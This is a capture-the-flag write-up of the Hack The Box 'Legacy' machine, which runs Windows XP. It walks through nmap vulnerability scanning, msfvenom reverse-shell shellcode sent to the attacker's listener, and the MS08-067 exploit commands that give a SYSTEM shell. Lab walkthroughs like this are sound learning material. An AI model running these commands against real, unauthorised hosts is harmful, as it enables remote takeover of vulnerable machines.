# LEGACY | 10.10.10.4

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial $IP

### Open Ports and Their Services

* 139/445 - SMB - message signing disabled
* 3389 (closed) - RDP Server?

### OS Discovery

The nmap scan says this is an ancient Windows XP (Windows 2000 LAN Manager), so, wow.

## Services Enumeration

This box is so old that I am actually having trouble enumerating with my usual tools. `smbclient` required a setting in the conf file to even think about connecting, and after the login prompt, errored out with 'NT_STATUS_INVALID_PARAMETER'.

So, as with the Blue box, I opted to use nmap's `vuln` scanner on the SMB ports:

    nmap -v -T4 -sV --script vuln -p139,445 -oN nmap/vuln 10.10.10.4

A whole lotta vulns came back in the results (including EternalBlue), which makes sense because this box old AF:

![](img/vulns-nmap.png)

This time, before searching the web, I check to see if searchsploit has anything on hand locally:

![](img/searchsploit.png)

I choose the first one on the list, since it's python-based.

## Exploitation

The python exploit is pretty well-documented, so that helps me wrap my head around it.

![](img/exploit.png)

I need to put in my own shellcode and replace the code that is there. I can use msfvenom for this:

    msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" LHOST=10.10.14.36 LPORT=6969 -f python

This spits out the shellcode, and I replace the previous code in the script with mine, and making a couple of other QOL adjustments.

Now, I just need to run the exploit with the correct parameter (in this case, '1' for Windows XP):

    python ms08-67.py 10.10.10.4 1

And have a netcat listener running:

    rlwrap nc -nvlp 6969

Fingers crossed.

![](img/timeout.png)

Maybe I should have also crossed my toes. OK, now I'll go online and check for an updated version. [This](https://github.com/andyacer/ms08_067) might do. It's very similar to the one I was using, with some changes, so I'll try it.

Gotta redo the shellcode, this time it gets output in C:

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.36 LPORT=6969 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

And the exploit runs in a similar way to the other one, just need to add the port:

    ./exploit.py 10.10.10.4 1 445

Fingers **and toes** crossed.

 Well, I'll say I got the same error. So I decided to try all the versions of Windows that the exploit allegedly supports, which just requires me to modify the argument I send in the command.

 Putting in 6 was the ticket (apparently the box is running Win XP SP3 - thorough enumeration matters!)

 ![](img/itworks.png)

This is amusing: on WinXP there is no `whoami` command, and other options for finding out the user were not working (ie `echo %username`, checking `set`), so I just had to hope I was root.

![](img/shell.png)

I confirmed that by being able to access and read both flags:

![](img/user-flag.png)
![](img/root-flag.png)

## Conclusion

Another easy box, only slightly complicated by my lazy Windows version enumeration. It's possible that I could have used EternalBlue on this one too.

Steps taken:

* Enumerate with nmap to find a vuln in the Server service, code execution via a crafted RPC request
* Improperly enumerate version of WinXP and try to exploit and fail until I got wise
* Run the MS08-067 exploit to gain a root shell (I think)
